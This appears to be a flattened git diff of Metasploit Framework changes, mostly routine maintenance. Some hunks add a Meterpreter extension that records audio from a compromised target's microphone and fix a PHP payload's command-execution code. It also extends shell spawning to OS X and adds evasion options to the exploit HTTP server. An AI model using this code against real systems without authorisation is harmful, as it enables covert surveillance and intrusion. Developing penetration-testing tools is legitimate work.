# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'net/https' require 'net/https'
require 'net/http' require 'net/http'

View File

@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
require 'uri' require 'uri'

View File

@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'net/https' require 'net/https'
require 'net/http' require 'net/http'

View File

@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'net/https' require 'net/https'
require 'net/http' require 'net/http'

View File

@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'msf/core/auxiliary' require 'msf/core/auxiliary'

View File

@ -810,6 +810,7 @@ module Msf
%Q|<html> %Q|<html>
<head> <head>
<meta http-equiv="cache-control" content="no-cache" />
<script> <script>
#{js} #{js}
</script> </script>

View File

@ -32,6 +32,7 @@ module Exploit::Remote::HttpServer
register_evasion_options( register_evasion_options(
[ [
OptBool.new('HTTP::no_cache', [false, 'Disallow the browser to cache HTTP content', false]),
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]), OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]),
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]), OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]),
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]), OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]),
@ -42,7 +43,8 @@ module Exploit::Remote::HttpServer
register_advanced_options([ register_advanced_options([
OptAddress.new('URIHOST', [false, 'Host to use in URI (useful for tunnels)']), OptAddress.new('URIHOST', [false, 'Host to use in URI (useful for tunnels)']),
OptPort.new('URIPORT', [false, 'Port to use in URI (useful for tunnels)']) OptPort.new('URIPORT', [false, 'Port to use in URI (useful for tunnels)']),
OptBool.new('SendRobots', [false, 'Return a robots.txt file if asked for one', false])
]) ])
# Used to keep track of resources added to the service manager by # Used to keep track of resources added to the service manager by
@ -179,7 +181,26 @@ module Exploit::Remote::HttpServer
print_status("Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}") print_status("Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
end end
if datastore['SendRobots']
add_robots_resource
end
add_resource(uopts) add_resource(uopts)
end
def add_robots_resource
proc = Proc.new do |cli, req|
self.cli = cli
send_robots(cli, req)
end
vprint_status('Adding hardcoded URI /robots.txt')
begin
add_resource('Path' => '/robots.txt', 'Proc' => proc)
rescue RuntimeError => e
print_warning(e.message)
end
end end
# Set {#on_request_uri} to handle the given +uri+ in addition to the one # Set {#on_request_uri} to handle the given +uri+ in addition to the one
@ -558,6 +579,10 @@ module Exploit::Remote::HttpServer
response.headers.junk_headers = 1 response.headers.junk_headers = 1
end end
if datastore['HTTP::no_cache']
response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate'
end
headers.each_pair { |k,v| response[k] = v } headers.each_pair { |k,v| response[k] = v }
cli.send_response(response) cli.send_response(response)
@ -605,6 +630,22 @@ module Exploit::Remote::HttpServer
cli.send_response(resp_404) cli.send_response(resp_404)
end end
#
# Sends a canned robots.txt file
#
def send_robots(cli, request)
print_status('Sending robots.txt')
robots = create_response(200, 'Success')
robots['Content-Type'] = 'text/plain'
robots.body = %Q{\
User-agent: *
Disallow: /
}
cli.send_response(robots)
end
# #
# Returns the configured (or random, if not configured) URI path # Returns the configured (or random, if not configured) URI path

View File

@ -4,7 +4,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
### ###

8
lib/msf/core/exploit/smtp_deliver.rb Normal file → Executable file
View File

@ -184,7 +184,7 @@ module Exploit::Remote::SMTPDeliver
raw_send_recv("MAIL FROM: <#{mailfrom}>\r\n", nsock) raw_send_recv("MAIL FROM: <#{mailfrom}>\r\n", nsock)
res = raw_send_recv("RCPT TO: <#{mailto}>\r\n", nsock) res = raw_send_recv("RCPT TO: <#{mailto}>\r\n", nsock)
if res[0..2] == '250' if res && res[0..2] == '250'
resp = raw_send_recv("DATA\r\n", nsock) resp = raw_send_recv("DATA\r\n", nsock)
# If the user supplied a Date field, use that, else use the current # If the user supplied a Date field, use that, else use the current
@ -242,10 +242,12 @@ module Exploit::Remote::SMTPDeliver
# to dump it all. # to dump it all.
vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}")
end end
begin
nsock.put(cmd) nsock.put(cmd)
res = nsock.get_once res = nsock.get_once
rescue
return nil
end
# Don't truncate the server output because it might be helpful for # Don't truncate the server output because it might be helpful for
# debugging. # debugging.
vprint_status("S: #{res.strip}") if res vprint_status("S: #{res.strip}") if res

View File

@ -173,7 +173,8 @@ class Msf::Modules::Loader::Base
true true
} }
loaded = namespace_module_transaction(type + "/" + module_reference_name, :reload => reload, &try_eval_module) loaded = namespace_module_transaction(type + "/" + module_reference_name,
:reload => reload, &try_eval_module)
unless loaded unless loaded
return false return false
end end

View File

@ -28,12 +28,11 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
def each_module_reference_name(path, opts={}) def each_module_reference_name(path, opts={})
whitelist = opts[:whitelist] || [] whitelist = opts[:whitelist] || []
::Dir.foreach(path) do |entry| ::Dir.foreach(path) do |entry|
full_entry_path = ::File.join(path, entry) full_entry_path = ::File.join(path, entry)
type = entry.singularize type = entry.singularize
unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type) next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
next
end
full_entry_pathname = Pathname.new(full_entry_path) full_entry_pathname = Pathname.new(full_entry_path)
@ -43,6 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
entry_descendant_pathname = Pathname.new(entry_descendant_path) entry_descendant_pathname = Pathname.new(entry_descendant_path)
relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname) relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
relative_entry_descendant_path = relative_entry_descendant_pathname.to_s relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
next if File::basename(relative_entry_descendant_path) == "example.rb"
# The module_reference_name doesn't have a file extension # The module_reference_name doesn't have a file extension
module_reference_name = module_reference_name_from_path(relative_entry_descendant_path) module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)

View File

@ -103,7 +103,7 @@ module Msf::Payload::Php
}else" }else"
proc_open = " proc_open = "
if(#{is_callable}('proc_open')and!#{in_array}('proc_open',#{dis})){ if(#{is_callable}('proc_open')and!#{in_array}('proc_open',#{dis})){
$handle=proc_open(#{cmd},array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
#{output}=NULL; #{output}=NULL;
while(!feof($pipes[1])){ while(!feof($pipes[1])){
#{output}.=fread($pipes[1],1024); #{output}.=fread($pipes[1],1024);

View File

@ -278,6 +278,16 @@ module RFTransceiver
return_success(r) return_success(r)
end end
#
# Sets lowball. Ensure you set the frequency first before using this
# @return [Boolean] success value
def set_lowball
return false unless is_rf?
self.index ||= 0
r = client.rftransceiver.set_lowball(self.index)
return_success(r)
end
# #
# Set power level # Set power level
# @param level [Integer] Power level # @param level [Integer] Power level

View File

@ -21,3 +21,4 @@ end
# Executable generation and encoding # Executable generation and encoding
require 'msf/util/exe' require 'msf/util/exe'
require 'msf/util/helper'

View File

@ -106,7 +106,7 @@ require 'msf/core/exe/segment_appender'
# @return [String] # @return [String]
# @return [NilClass] # @return [NilClass]
def self.to_executable(framework, arch, plat, code = '', opts = {}) def self.to_executable(framework, arch, plat, code = '', opts = {})
if elf? code if elf? code or macho? code
return code return code
end end
@ -2148,6 +2148,9 @@ require 'msf/core/exe/segment_appender'
end end
end end
when 'macho', 'osx-app' when 'macho', 'osx-app'
if macho? code
macho = code
else
macho = case arch macho = case arch
when ARCH_X86,nil when ARCH_X86,nil
to_osx_x86_macho(framework, code, exeopts) to_osx_x86_macho(framework, code, exeopts)
@ -2158,6 +2161,7 @@ require 'msf/core/exe/segment_appender'
when ARCH_PPC when ARCH_PPC
to_osx_ppc_macho(framework, code, exeopts) to_osx_ppc_macho(framework, code, exeopts)
end end
end
fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
when 'vba' when 'vba'
Msf::Util::EXE.to_vba(framework, code, exeopts) Msf::Util::EXE.to_vba(framework, code, exeopts)
@ -2284,6 +2288,10 @@ require 'msf/core/exe/segment_appender'
code[0..3] == "\x7FELF" code[0..3] == "\x7FELF"
end end
def self.macho?(code)
code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE"
end
end end
end end
end end

21
lib/msf/util/helper.rb Normal file
View File

@ -0,0 +1,21 @@
# -*- coding: binary -*-
module Msf
module Util
class Helper
# Cross-platform way of finding an executable in the $PATH.
#
# which('ruby') #=> /usr/bin/ruby
def self.which(cmd)
exts = ENV['PATHEXT'] ? ENV['PATHEXT'].split(';') : ['']
ENV['PATH'].split(File::PATH_SEPARATOR).each do |path|
exts.each { |ext|
exe = File.join(path, "#{cmd}#{ext}")
return exe if File.executable?(exe) && !File.directory?(exe)
}
end
return nil
end
end
end
end

View File

@ -4,7 +4,7 @@ require 'openssl/ccm'
require 'metasm' require 'metasm'
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##

View File

@ -186,6 +186,10 @@ class RFTransceiver < Extension
client.send_request("/rftransceiver/#{idx}/set_number_preamble?num=#{num}") client.send_request("/rftransceiver/#{idx}/set_number_preamble?num=#{num}")
end end
def set_lowball(idx)
client.send_request("/rftransceiver/#{idx}/set_lowball")
end
def set_maxpower(idx) def set_maxpower(idx)
client.send_request("/rftransceiver/#{idx}/set_maxpower") client.send_request("/rftransceiver/#{idx}/set_maxpower")
end end

View File

@ -34,6 +34,7 @@ class Console::CommandDispatcher::RFtransceiver
'deviation' => 'sets the deviation', 'deviation' => 'sets the deviation',
'sync_word' => 'sets the sync word', 'sync_word' => 'sets the sync word',
'preamble' => 'sets the preamble number', 'preamble' => 'sets the preamble number',
'lowball' => 'sets lowball',
'power' => 'sets the power level', 'power' => 'sets the power level',
'maxpower' => 'sets max power' 'maxpower' => 'sets max power'
} }
@ -528,6 +529,20 @@ class Console::CommandDispatcher::RFtransceiver
print_success(r) print_success(r)
end end
def cmd_lowball_help
print_line("Lowball is frequency dependent. Set frequency first")
end
def cmd_lowball(*args)
self.idx ||= 0
if args.length.positive?
cmd_lowball_help
return
end
r = client.rftransceiver.set_lowball(idx)
print_success(r)
end
def cmd_maxpower_help def cmd_maxpower_help
print_line("Max power is frequency dependent. Set frequency first") print_line("Max power is frequency dependent. Set frequency first")
end end

View File

@ -195,19 +195,15 @@ class Dir < Rex::Post::Dir
# Downloads the contents of a remote directory a # Downloads the contents of a remote directory a
# local directory, optionally in a recursive fashion. # local directory, optionally in a recursive fashion.
# #
def Dir.download(dst, src, opts, force = true, glob = nil, &stat) def Dir.download(dst, src, opts = {}, force = true, glob = nil, &stat)
recursive = false
continue = false
tries = false
tries_no = 0
tries_cnt = 0 tries_cnt = 0
if opts
continue = opts["continue"]
recursive = opts["recursive"]
timestamp = opts["timestamp"] timestamp = opts["timestamp"]
recursive = true if opts["recursive"] tries_no = opts["tries_no"] || 0
continue = true if opts["continue"] tries = opts["tries"]
tries = true if opts["tries"]
tries_no = opts["tries_no"]
end
begin begin
dir_files = self.entries(src, glob) dir_files = self.entries(src, glob)
rescue Rex::TimeoutError rescue Rex::TimeoutError

View File

@ -301,8 +301,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
# If a block is given, it will be called before each file is downloaded and # If a block is given, it will be called before each file is downloaded and
# again when each download is complete. # again when each download is complete.
# #
def File.download(dest, src_files, opts = nil, &stat) def File.download(dest, src_files, opts = {}, &stat)
timestamp = opts["timestamp"] if opts timestamp = opts["timestamp"]
[*src_files].each { |src| [*src_files].each { |src|
if (::File.basename(dest) != File.basename(src)) if (::File.basename(dest) != File.basename(src))
# The destination when downloading is a local file so use this # The destination when downloading is a local file so use this
@ -324,18 +324,15 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
# #
# Download a single file. # Download a single file.
# #
def File.download_file(dest_file, src_file, opts = nil, &stat) def File.download_file(dest_file, src_file, opts = {}, &stat)
continue=false
tries=false
tries_no=0
stat ||= lambda { |a,b,c| } stat ||= lambda { |a,b,c| }
if opts adaptive = opts["adaptive"]
continue = true if opts["continue"] block_size = opts["block_size"] || 1024 * 1024
adaptive = true if opts['adaptive'] continue = opts["continue"]
tries = true if opts["tries"]
tries_no = opts["tries_no"] tries_no = opts["tries_no"]
end tries = opts["tries"]
src_fd = client.fs.file.new(src_file, "rb") src_fd = client.fs.file.new(src_file, "rb")
# Check for changes # Check for changes
@ -373,7 +370,6 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
end end
# Keep transferring until EOF is reached... # Keep transferring until EOF is reached...
block_size = (opts && opts['block_size']) || 1024 * 1024
begin begin
if tries if tries
# resume when timeouts encountered # resume when timeouts encountered

View File

@ -0,0 +1,62 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/channel'
require 'rex/post/meterpreter/channels/pools/stream_pool'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Mic
###
#
# This meterpreter extension can list and capture from microphone
#
###
class Mic
def initialize(client)
@client = client
end
def session
@client
end
# List available microphones
def mic_list
response = client.send_request(Packet.create_request('audio_mic_list'))
names = []
if response.result == 0
response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).each do |tlv|
names << tlv.value
end
end
names
end
# Starts recording audio from microphone
def mic_start(device_id)
request = Packet.create_request('audio_mic_start')
request.add_tlv(TLV_TYPE_AUDIO_INTERFACE_ID, device_id)
response = client.send_request(request)
return nil unless response.result == 0
channel = Channel.create(client, 'audio_mic', Rex::Post::Meterpreter::Channels::Pools::StreamPool, CHANNEL_FLAG_SYNCHRONOUS)
end
# Stop recording from microphone
def mic_stop
client.send_request(Packet.create_request('audio_mic_stop'))
true
end
attr_accessor :client
end
end
end
end
end
end
end

View File

@ -19,6 +19,7 @@ require 'rex/post/meterpreter/extensions/stdapi/sys/power'
require 'rex/post/meterpreter/extensions/stdapi/railgun/railgun' require 'rex/post/meterpreter/extensions/stdapi/railgun/railgun'
require 'rex/post/meterpreter/extensions/stdapi/ui' require 'rex/post/meterpreter/extensions/stdapi/ui'
require 'rex/post/meterpreter/extensions/stdapi/webcam/webcam' require 'rex/post/meterpreter/extensions/stdapi/webcam/webcam'
require 'rex/post/meterpreter/extensions/stdapi/mic/mic'
module Rex module Rex
module Post module Post
@ -83,6 +84,10 @@ class Stdapi < Extension
'name' => 'webcam', 'name' => 'webcam',
'ext' => Rex::Post::Meterpreter::Extensions::Stdapi::Webcam::Webcam.new(client) 'ext' => Rex::Post::Meterpreter::Extensions::Stdapi::Webcam::Webcam.new(client)
}, },
{
'name' => 'mic',
'ext' => Rex::Post::Meterpreter::Extensions::Stdapi::Mic::Mic.new(client)
},
{ {
'name' => 'ui', 'name' => 'ui',
'ext' => UI.new(client) 'ext' => UI.new(client)

View File

@ -249,8 +249,10 @@ TLV_TYPE_WEBCAM_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
# #
## ##
TLV_TYPE_AUDIO_DURATION = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1) TLV_TYPE_AUDIO_DURATION = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 10)
TLV_TYPE_AUDIO_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 2) TLV_TYPE_AUDIO_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 11)
TLV_TYPE_AUDIO_INTERFACE_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 12)
TLV_TYPE_AUDIO_INTERFACE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13)
end; end; end; end; end end; end; end; end; end

View File

@ -18,6 +18,7 @@ class Console::CommandDispatcher::Stdapi
require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys' require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys'
require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui' require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui'
require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam' require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam'
require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic'
Klass = Console::CommandDispatcher::Stdapi Klass = Console::CommandDispatcher::Stdapi
@ -28,6 +29,7 @@ class Console::CommandDispatcher::Stdapi
Klass::Sys, Klass::Sys,
Klass::Ui, Klass::Ui,
Klass::Webcam, Klass::Webcam,
Klass::Mic
] ]
include Console::CommandDispatcher include Console::CommandDispatcher

View File

@ -0,0 +1,201 @@
class Mic
end# -*- coding: binary -*-
require 'rex/post/meterpreter'
require 'bindata'
module Rex
module Post
module Meterpreter
module Ui
###
#
# Mic - Capture audio from the remote system
#
###
class Console::CommandDispatcher::Stdapi::Mic
Klass = Console::CommandDispatcher::Stdapi::Mic
include Console::CommandDispatcher
#
# List of supported commands.
#
def commands
all = {
'mic_start' => 'start capturing an audio stream from the target mic',
'mic_stop' => 'stop capturing audio',
'mic_list' => 'list all microphone interfaces',
'listen' => 'listen to a saved audio recording via audio player'
}
reqs = {
'mic_start' => [ 'audio_mic_start' ],
'mic_stop' => [ 'audio_mic_stop' ],
'mic_list' => [ 'audio_mic_list' ],
'listen' => [ 'audio_mic_start' ]
}
filter_commands(all, reqs)
end
#
# Name for this dispatcher
#
def name
"Stdapi: Mic"
end
def cmd_mic_list
client.mic.mic_list
if client.mic.mic_list.length == 0
print_error("No mics were found")
return
end
client.mic.mic_list.each_with_index do |name, indx|
print_line("#{indx + 1}: #{name}")
end
end
def audio_file_wave_header(sample_rate_hz:, num_channels:, bits_per_sample:, data_size:)
subchunk1_size = 16
chunk_size = 4 + (8 + subchunk1_size) + (8 + data_size)
byte_rate = sample_rate_hz * num_channels * bits_per_sample / 8
block_align = num_channels * bits_per_sample / 8
[
BinData::Int32be.new(0x52494646), # ChunkID: "RIFF"
BinData::Int32le.new(chunk_size), # ChunkSize
BinData::Int32be.new(0x57415645), # Format: "WAVE"
BinData::Int32be.new(0x666d7420), # SubChunk1ID: "fmt "
BinData::Int32le.new(16), # SubChunk1Size
BinData::Int16le.new(1), # AudioFormat
BinData::Int16le.new(num_channels), # NumChannels
BinData::Int32le.new(sample_rate_hz), # SampleRate
BinData::Int32le.new(byte_rate), # ByteRate
BinData::Int16le.new(block_align), # BlockAlign
BinData::Int16le.new(bits_per_sample), # BitsPerSample
BinData::Int32be.new(0x64617461), # SubChunk2ID: "data"
BinData::Int32le.new(data_size) # SubChunk2Size
]
end
def cmd_mic_start(*args)
get_data = lambda do |channel, file|
data = channel.read(65536)
if data
::File.open(file, 'a') do |f|
f.write(data)
end
return data.length
end
return 0
end
device_id = 1
duration = 1800
saved_audio_path = Rex::Text.rand_text_alpha(8) + ".wav"
mic_start_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
"-d" => [ true, "The stream duration in seconds (Default: 1800)" ], # 30 min
"-m" => [ true, "Microphone device index to record from (1: system default)" ],
"-s" => [ true, "The saved audio file path (Default: '#{saved_audio_path}')" ]
)
mic_start_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line("Usage: mic_start [options]\n")
print_line("Streams and records audio from the target microphone.")
print_line(mic_start_opts.usage)
return
when "-d"
duration = val.to_i
when "-m"
device_id = val.to_i
when "-s"
saved_audio_path = val
end
end
mic_list = client.mic.mic_list
if mic_list.length == 0
print_error("Target does not have a mic")
return
end
if device_id < 1 || device_id > mic_list.length
print_error("Target does not have a mic with an id of #{device_id}")
return
end
channel = client.mic.mic_start(device_id)
if channel.nil?
print_error("Mic failed to start streaming.")
return
end
print_status("Saving to audio file: #{saved_audio_path}")
print_status("Streaming started...")
total_data_len = 0
begin
::File.open(saved_audio_path, 'wb') do |outfile|
audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: 2_000_000_000).each {
|e| e.write(outfile)
}
end
::Timeout.timeout(duration) do
while client do
Rex::sleep(0.5)
total_data_len += get_data.call(channel, saved_audio_path)
end
end
rescue ::Timeout::Error
ensure
total_data_len += get_data.call(channel, saved_audio_path)
client.mic.mic_stop
print_status("Streaming stopped.")
# Now that we know the actual length of data, update the file header.
::File.open(saved_audio_path, 'rb+') do |outfile|
outfile.seek(0, ::IO::SEEK_SET)
audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: total_data_len).each {
|e| e.write(outfile)
}
end
end
end
def cmd_listen(*args)
filename = nil
listen_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
"-f" => [ true, "audio filename" ]
)
listen_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line("Usage: listen -f <filename>\n")
print_line("Plays saved audio from a file.")
print_line(listen_opts.usage)
return
when "-f"
filename = val
end
end
if filename.nil?
print_error("use '-f' option to provide a filename for playback")
return
end
Rex::Compat.play_sound(::File.expand_path(filename))
end
def cmd_mic_stop
client.mic.mic_stop
end
end
end
end
end
end

View File

@ -259,7 +259,7 @@ class Console::CommandDispatcher::Stdapi::Sys
print_error( "Failed to spawn shell with thread impersonation. Retrying without it." ) print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
cmd_execute("-f", path, "-c", "-H", "-i") cmd_execute("-f", path, "-c", "-H", "-i")
end end
when 'linux' when 'linux', 'osx'
# Don't expand_path() this because it's literal anyway # Don't expand_path() this because it's literal anyway
path = "/bin/sh" path = "/bin/sh"
cmd_execute("-f", path, "-c", "-i") cmd_execute("-f", path, "-c", "-i")

View File

@ -1,74 +0,0 @@
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
# It is recommended to regenerate this file in the future when you upgrade to a
# newer version of cucumber-rails. Consider adding your own code to a new file
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
# files.
unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
begin
require 'cucumber/rake/task'
namespace :cucumber do
Cucumber::Rake::Task.new({:ok => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'default'
end
Cucumber::Rake::Task.new({:wip => 'db:test:prepare'}, 'Run features that are being worked on') do |t|
t.binary = vendored_cucumber_bin
t.fork = true # You may get faster startup if you set this to false
t.profile = 'wip'
end
Cucumber::Rake::Task.new({:rerun => 'db:test:prepare'}, 'Record failing features and run only them if any exist') do |t|
t.binary = vendored_cucumber_bin
t.fork = true # You may get faster startup if you set this to false
t.profile = 'rerun'
end
desc 'Run all features'
task :all => [:ok, :wip]
task :statsetup do
require 'rails/code_statistics'
::STATS_DIRECTORIES << %w(Cucumber\ features features) if File.exist?('features')
::CodeStatistics::TEST_TYPES << "Cucumber features" if File.exist?('features')
end
end
desc 'Alias for cucumber:ok'
task :cucumber => 'cucumber:ok'
task :default => :cucumber
task :features => :cucumber do
STDERR.puts "*** The 'features' task is deprecated. See rake -T cucumber ***"
end
# In case we don't have ActiveRecord, append a no-op task that we can depend upon.
task 'db:test:prepare' do
end
task 'db:config:restore' do
require 'metasploit/framework/database/cucumber'
Metasploit::Framework::Database::Cucumber.restore_project_configurations
end
# Restore the config/database.yml from config/database.cucumber.yml before attempting to copy development to test
# database in order to recover from interrupted cucumber runs
task 'environment' => 'db:config:restore'
task :stats => 'cucumber:statsetup'
rescue LoadError
desc 'cucumber rake task not available (cucumber not installed)'
task :cucumber do
abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
end
end
end

View File

@ -1,30 +0,0 @@
unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
begin
require 'cucumber/rake/task'
namespace :cucumber do
Cucumber::Rake::Task.new({:boot => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'boot'
end
Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'exploit'
end
end
rescue LoadError
desc 'cucumber rake task not available (cucumber not installed)'
task :cucumber do
abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
end
end
end

View File

@ -13,6 +13,7 @@ end
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'metasploit/framework/version' require 'metasploit/framework/version'
require 'metasploit/framework/rails_version_constraint' require 'metasploit/framework/rails_version_constraint'
require 'msf/util/helper'
Gem::Specification.new do |spec| Gem::Specification.new do |spec|
spec.name = 'metasploit-framework' spec.name = 'metasploit-framework'
@ -24,7 +25,8 @@ Gem::Specification.new do |spec|
spec.homepage = 'https://www.metasploit.com' spec.homepage = 'https://www.metasploit.com'
spec.license = 'BSD-3-clause' spec.license = 'BSD-3-clause'
if File.directory?(File.join(File.dirname(__FILE__), ".git")) # only do a git ls-files if the .git folder exists and we have a git binary in PATH
if File.directory?(File.join(File.dirname(__FILE__), ".git")) && Msf::Util::Helper.which("git")
spec.files = `git ls-files`.split($/).reject { |file| spec.files = `git ls-files`.split($/).reject { |file|
file =~ /^documentation|^external/ file =~ /^documentation|^external/
} }
@ -68,9 +70,9 @@ Gem::Specification.new do |spec|
# are needed when there's no database # are needed when there's no database
spec.add_runtime_dependency 'metasploit-model' spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter # Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.2.37' spec.add_runtime_dependency 'metasploit-payloads', '1.2.44'
# Needed for the next-generation POSIX Meterpreter # Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10' spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
# Needed by msfgui and other rpc components # Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack' spec.add_runtime_dependency 'msgpack'
# get list of network interfaces, like eth* from OS. # get list of network interfaces, like eth* from OS.
@ -134,7 +136,7 @@ Gem::Specification.new do |spec|
# Library for Generating Randomized strings valid as Identifiers such as variable names # Library for Generating Randomized strings valid as Identifiers such as variable names
spec.add_runtime_dependency 'rex-random_identifier' spec.add_runtime_dependency 'rex-random_identifier'
# library for creating Powershell scripts for exploitation purposes # library for creating Powershell scripts for exploitation purposes
spec.add_runtime_dependency 'rex-powershell' spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
# Library for processing and creating Zip compatbile archives # Library for processing and creating Zip compatbile archives
spec.add_runtime_dependency 'rex-zip' spec.add_runtime_dependency 'rex-zip'
# Library for parsing offline Windows Registry files # Library for parsing offline Windows Registry files

View File

@ -1,10 +1,9 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
